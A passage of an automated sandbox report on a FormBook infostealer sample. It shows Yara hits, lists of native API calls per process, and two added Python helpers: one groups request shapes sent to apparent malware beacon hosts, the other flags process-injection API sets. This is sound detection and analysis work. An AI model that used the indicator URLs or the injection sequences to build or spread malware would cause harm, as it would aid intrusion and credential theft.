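    _req("/nff/?D48p=kOxlMsEjtzqi35JKXOQvqY0Z9Dr8MJKVGpcl7uHZUSc/duxdP9tVlajaQyGMVspbd71z&-ZgX=tR-DSFa8o", "www.oubacm.com"),
    _req("/nff/?-ZgX=tR-DSFa8o&D48p=1Xxx+qd8pBTLA+WTXKo7XaXaUaa/vtHv40sNd0BzbA6K7Qnc9Dw7+srX/AipaLaYNVgg", "www.mothererph.com"),
    _req("/nff/?-ZgX=tR-DSFa8o&D48p=t6POCtyEK9WeI3wHMDqVXFf1P6NZVFBUQrx3hzUMeWhQO7zB8dJJWUZafBhAs6NE8fvj", "www.howtovvbucks.com"),
    _req("/nff/?D48p=BYCicstSjiimYQeLhOM2IfVFUU5xkRxUW/ddRKXtK0U5B2C8EeMnAtCjd12GxjTXIZnB&-ZgX=tR-DSFa8o", "www.yellow-wink.com"),
    _req("/index.html?lang=en&ref=home", "www.example.com", "Mozilla/5.0"),  # benign, constructed
]

if __name__ == "__main__":
    for (path, names), hosts in find_beacon_campaigns(SAMPLE_REQUESTS).items():
        print(f"{path} params={names}: {len(hosts)} hosts -> {', '.join(hosts)}")
```

The grouping key is the request shape (path plus parameter names), not the literal /nff/ or D48p, because those change per build; one matching request is weak evidence, the same shape fanned out to several unrelated hosts in a short window is the FormBook decoy behaviour the configuration above describes.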

E-Banking Fraud:

Yara detected FormBook
Source: Yara match; File source: 00000012.00000002.475233799.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000001F.00000002.1285321494.0000000004EF0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000001F.00000002.1284276742.0000000000C20000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000012.00000002.480114894.000000001E160000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000001D.00000000.464429746.000000000618B000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000001F.00000002.1285203514.0000000004EC0000.00000040.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)
Source: 0000001F.00000002.1285459135.0000000004FC5000.00000004.00000020.sdmp, type: MEMORY; Matched rule: Auto-generated rule - file scan copy.pdf.r11, Author: Florian Roth
Source: 00000012.00000002.475233799.00000000000A0000.00000040.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000012.00000002.475233799.00000000000A0000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 0000001F.00000002.1285321494.0000000004EF0000.00000004.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001F.00000002.1285321494.0000000004EF0000.00000004.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 0000001F.00000002.1284276742.0000000000C20000.00000040.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001F.00000002.1284276742.0000000000C20000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000012.00000002.480114894.000000001E160000.00000040.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000012.00000002.480114894.000000001E160000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 0000001D.00000000.464429746.000000000618B000.00000040.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001D.00000000.464429746.000000000618B000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 0000001F.00000002.1285203514.0000000004EC0000.00000040.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001F.00000002.1285203514.0000000004EC0000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 0000001F.00000002.1287054375.000000000596F000.00000004.00000001.sdmp, type: MEMORY; Matched rule: Auto-generated rule - file scan copy.pdf.r11, Author: Florian Roth
Source: C:\Users\user\Desktop\F63V4i8eZU.exe; Process Stats: CPU usage > 98%
Source: C:\Users\user\Desktop\F63V4i8eZU.exe; Code function: 0_2_022A5852 NtWriteVirtualMemory, LoadLibraryA
Source: C:\Users\user\Desktop\F63V4i8eZU.exe; Code function: 0_2_022A88E2 NtProtectVirtualMemory
Source: C:\Users\user\Desktop\F63V4i8eZU.exe; Code function: 0_2_022A08DC NtWriteVirtualMemory, TerminateProcess
Source: C:\Users\user\Desktop\F63V4i8eZU.exe; Code function: 0_2_022A045E EnumWindows, NtWriteVirtualMemory
Source: C:\Users\user\Desktop\F63V4i8eZU.exe; Code function: 0_2_022A8DB4 NtWriteVirtualMemory, CreateProcessInternalW
Source: C:\Users\user\Desktop\F63V4i8eZU.exe; Code function: 0_2_022A55EC NtAllocateVirtualMemory
Source: C:\Users\user\Desktop\F63V4i8eZU.exe; Code function: 0_2_022A423F NtWriteVirtualMemory
Source: C:\Users\user\Desktop\F63V4i8eZU.exe; Code function: 0_2_022A4263 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\F63V4i8eZU.exe; Code function: 0_2_022A4277 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\F63V4i8eZU.exe; Code function: 0_2_022A5A46 NtWriteVirtualMemory, LoadLibraryA
Source: C:\Users\user\Desktop\F63V4i8eZU.exe; Code function: 0_2_022A33A7 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\F63V4i8eZU.exe; Code function: 0_2_022A48E8 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\F63V4i8eZU.exe; Code function: 0_2_022A28E2 NtWriteVirtualMemory, LoadLibraryA
Source: C:\Users\user\Desktop\F63V4i8eZU.exe; Code function: 0_2_022A4128 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\F63V4i8eZU.exe; Code function: 0_2_022A513E NtWriteVirtualMemory
Source: C:\Users\user\Desktop\F63V4i8eZU.exe; Code function: 0_2_022A46E4 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\F63V4i8eZU.exe; Code function: 0_2_022A5724 NtAllocateVirtualMemory
Source: C:\Users\user\Desktop\F63V4i8eZU.exe; Code function: 0_2_022A1FD9 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\F63V4i8eZU.exe; Code function: 0_2_022A4C2B NtWriteVirtualMemory
Source: C:\Users\user\Desktop\F63V4i8eZU.exe; Code function: 0_2_022A4C21 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\F63V4i8eZU.exe; Code function: 0_2_022A2470 NtWriteVirtualMemory, LoadLibraryA
Source: C:\Users\user\Desktop\F63V4i8eZU.exe; Code function: 0_2_022A3C4D NtWriteVirtualMemory
Source: C:\Users\user\Desktop\F63V4i8eZU.exe; Code function: 0_2_022A4C45 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\F63V4i8eZU.exe; Code function: 0_2_022A7CA5 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\F63V4i8eZU.exe; Code function: 0_2_022A4CBE NtWriteVirtualMemory
Source: C:\Users\user\Desktop\F63V4i8eZU.exe; Code function: 0_2_022A4CB4 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\F63V4i8eZU.exe; Code function: 0_2_022A7488 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\F63V4i8eZU.exe; Code function: 0_2_022A4CD8 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\F63V4i8eZU.exe; Code function: 0_2_022A4D4C NtWriteVirtualMemory
Source: C:\Users\user\Desktop\F63V4i8eZU.exe; Code function: 18_2_1E3F9A20 NtResumeThread, LdrInitializeThunk
Source: C:\Users\user\Desktop\F63V4i8eZU.exe; Code function: 18_2_1E3F9A00 NtProtectVirtualMemory, LdrInitializeThunk
Source: C:\Users\user\Desktop\F63V4i8eZU.exe; Code function: 18_2_1E3F9660 NtAllocateVirtualMemory, LdrInitializeThunk
Source: C:\Users\user\Desktop\F63V4i8eZU.exe; Code function: 18_2_1E3F9A50 NtCreateFile, LdrInitializeThunk
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3F96E0 NtFreeVirtualMemory,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3F9710 NtQueryInformationToken,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3F97A0 NtUnmapViewOfSection,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3F9780 NtMapViewOfSection,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3F9860 NtQuerySystemInformation,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3F9840 NtDelayExecution,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3F98F0 NtReadVirtualMemory,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3F9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3F9540 NtReadFile,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3F99A0 NtCreateSection,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3F95D0 NtClose,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3F9610 NtEnumerateValueKey,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3F9A10 NtQuerySection,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3F9670 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3F9650 NtQueryValueKey,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3F9A80 NtOpenDirectoryObject,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3F96D0 NtCreateKey,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3F9730 NtQueryVirtualMemory,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3FA710 NtOpenProcessToken,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3F9B00 NtSetValueKey,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3F9770 NtSetInformationFile,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3FA770 NtOpenThread,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3F9760 NtOpenProcess,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3FA3B0 NtGetContextThread,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3F9FE0 NtCreateMutant,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3F9820 NtEnumerateKey,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3FB040 NtSuspendThread,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3F98A0 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3FAD30 NtSetContextThread,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3F9520 NtWaitForSingleObject,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3F9560 NtWriteFile,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3F9950 NtQueueApcThread,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3F95F0 NtQueryInformationFile,
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3F99D0 NtCreateProcessEx,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054A9540 NtReadFile,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054A95D0 NtClose,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054A9710 NtQueryInformationToken,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054A9FE0 NtCreateMutant,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054A9780 NtMapViewOfSection,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054A9650 NtQueryValueKey,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054A9660 NtAllocateVirtualMemory,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054A96D0 NtCreateKey,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054A96E0 NtFreeVirtualMemory,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054A9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054A99A0 NtCreateSection,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054A9840 NtDelayExecution,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054A9860 NtQuerySystemInformation,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054A9A50 NtCreateFile,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054A9560 NtWriteFile,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054A9520 NtWaitForSingleObject,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054AAD30 NtSetContextThread,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054A95F0 NtQueryInformationFile,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054A9760 NtOpenProcess,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054AA770 NtOpenThread,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054A9770 NtSetInformationFile,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054AA710 NtOpenProcessToken,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054A9730 NtQueryVirtualMemory,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054A97A0 NtUnmapViewOfSection,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054A9670 NtQueryInformationProcess,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054A9610 NtEnumerateValueKey,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054A9950 NtQueueApcThread,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054A99D0 NtCreateProcessEx,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054AB040 NtSuspendThread,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054A9820 NtEnumerateKey,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054A98F0 NtReadVirtualMemory,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054A98A0 NtWriteVirtualMemory,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054A9B00 NtSetValueKey,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054AA3B0 NtGetContextThread,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054A9A00 NtProtectVirtualMemory,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054A9A10 NtQuerySection,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054A9A20 NtResumeThread,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054A9A80 NtOpenDirectoryObject,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_00C39D50 NtCreateFile,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_00C39E80 NtClose,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_00C39E00 NtReadFile,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_00C39F30 NtAllocateVirtualMemory,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_00C39DA9 NtReadFile,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_00C39E7A NtClose,
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_00C39F2D NtAllocateVirtualMemory,
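The Code function lines above list, per process, the native API calls found in the unpacked code: the leading number is the report's process index (0 is the original F63V4i8eZU.exe, 18 the re-spawned F63V4i8eZU.exe in which the FormBook Yara rules match, 31 the chkdsk.exe started by explorer.exe). Read as a whole, process 0 only writes and protects memory and creates a process, while 18 and 31 carry the complete unmap/map/write/set-context/resume and queue-APC sequences. The script below is an added example, not part of this report or of the sandbox: it parses lines in exactly this fused format, merges the API names per process, and flags the textbook injection combinations. The technique-to-API mapping is an assumption of mine, not something the report states, and the embedded lines are a subset copied from the list above.

```python
"""Group the report's "Code function" lines by process and flag
injection-related native API combinations.

Added example, not part of the sandbox report. SAMPLE_LINES is a subset
copied from the report; TECHNIQUES is an assumed mapping of textbook
injection sequences to the API names they need.
"""
import re
from collections import defaultdict

# The extracted report fuses the source column and the "Code function"
# column, hence ".exe" immediately followed by "Code function:".
LINE_RE = re.compile(
    r"Source:\s*(?P<src>.+?\.exe)Code function:\s*"
    r"(?P<proc>\d+)_(?P<second>\d+)_(?P<addr>[0-9A-Fa-f]+)\s*(?P<apis>.*)$"
)

# Assumption: the minimal API set whose presence in one process suggests the technique.
TECHNIQUES = {
    "process hollowing": {"NtUnmapViewOfSection", "NtWriteVirtualMemory",
                          "NtSetContextThread", "NtResumeThread"},
    "APC injection": {"NtQueueApcThread", "NtWriteVirtualMemory"},
    "section mapping injection": {"NtCreateSection", "NtMapViewOfSection"},
    "thread context hijack": {"NtSuspendThread", "NtGetContextThread",
                              "NtSetContextThread", "NtResumeThread"},
    "write into newly created process": {"CreateProcessInternalW", "NtWriteVirtualMemory"},
}

# Subset of the report lines above (copied verbatim, fused columns included).
SAMPLE_LINES = (
    r"Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A5852 NtWriteVirtualMemory,LoadLibraryA,",
    r"Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A88E2 NtProtectVirtualMemory,",
    r"Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A8DB4 NtWriteVirtualMemory,CreateProcessInternalW,",
    r"Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A55EC NtAllocateVirtualMemory,",
    r"Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3F9A20 NtResumeThread,LdrInitializeThunk,",
    r"Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3F97A0 NtUnmapViewOfSection,LdrInitializeThunk,",
    r"Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3F9780 NtMapViewOfSection,LdrInitializeThunk,",
    r"Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3F99A0 NtCreateSection,LdrInitializeThunk,",
    r"Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3FA3B0 NtGetContextThread,",
    r"Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3FB040 NtSuspendThread,",
    r"Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3F98A0 NtWriteVirtualMemory,",
    r"Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3FAD30 NtSetContextThread,",
    r"Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3F9950 NtQueueApcThread,",
    r"Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3F99D0 NtCreateProcessEx,",
    r"Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054A9780 NtMapViewOfSection,LdrInitializeThunk,",
    r"Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054A99A0 NtCreateSection,LdrInitializeThunk,",
    r"Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054AAD30 NtSetContextThread,",
    r"Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054A97A0 NtUnmapViewOfSection,",
    r"Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054A9950 NtQueueApcThread,",
    r"Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054AB040 NtSuspendThread,",
    r"Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054A98A0 NtWriteVirtualMemory,",
    r"Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054AA3B0 NtGetContextThread,",
    r"Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_054A9A20 NtResumeThread,",
    r"Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 31_2_00C39F2D NtAllocateVirtualMemory,",
)


def parse_line(line):
    """Return (source_path, process_index, address, [api, ...]) or None for other line kinds."""
    m = LINE_RE.search(line)
    if m is None:
        return None
    apis = [a.strip() for a in m.group("apis").split(",") if a.strip()]
    return m.group("src"), int(m.group("proc")), int(m.group("addr"), 16), apis


def apis_by_process(lines):
    """Merge the API names of every parsed line into one set per (path, process index)."""
    merged = defaultdict(set)
    for line in lines:
        parsed = parse_line(line)
        if parsed is not None:
            src, proc, _addr, apis = parsed
            merged[(src, proc)].update(apis)
    return dict(merged)


def flag_techniques(api_set):
    """Names of the techniques whose full API set is present, sorted for stable output."""
    return sorted(name for name, needed in TECHNIQUES.items() if needed <= api_set)


def report(lines):
    """{(path, process index): [technique, ...]} for every process seen in the lines."""
    return {key: flag_techniques(apis) for key, apis in apis_by_process(lines).items()}


if __name__ == "__main__":
    for (path, proc), found in sorted(report(SAMPLE_LINES).items(), key=lambda kv: kv[0][1]):
        print(f"{path} (process {proc}): {', '.join(found) or 'no complete sequence'}")
```

Run against the full report the same way; the interesting output is not the per-process list but the difference between process 0 (loader: allocate, write, create process) and processes 18 and 31 (the same unpacked payload running twice, once in the sample and once inside chkdsk.exe).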
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A5359
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A5852
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A08DC
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A045E
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A8DB4
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A55EC
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A423F
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A4263
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A4277
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A5A46
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A8254
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A5A84
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A2AFD
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A2AD6
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A22D5
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A0B2B
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A0B73
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A33A7
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A0B9B
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A33EC
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A103C
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A781E
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A78B2
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A48E8
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A28E2
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A4128
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A3920
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A8138
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A513E
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A09A8
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A19CC
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A2E2F
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A0618
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A8E7C
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A968F
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A46E4
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A7EFC
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A8ED8
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A8F40
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A7FF5
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A1FD9
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A2470
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A3C4D
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A2C5C
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A84A6
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A7CA5
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A348A
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A7488
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A34EA
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A84E9
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A3568
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A0D50
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A2DA0
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A35B0
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A0584
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 0_2_022A25D4
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3D6E30
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E482EF7
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E4822AE
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E482B28
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3EEBB0
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E47DBD2
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E481FF1
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E47D466
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3C841F
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E471002
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3E20A0
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E4828EC
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3CB090
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E4820A8
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3B0D20
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E481D55
      Source: C:\Users\user\Desktop\F63V4i8eZU.exeCode function: 18_2_1E3D4120
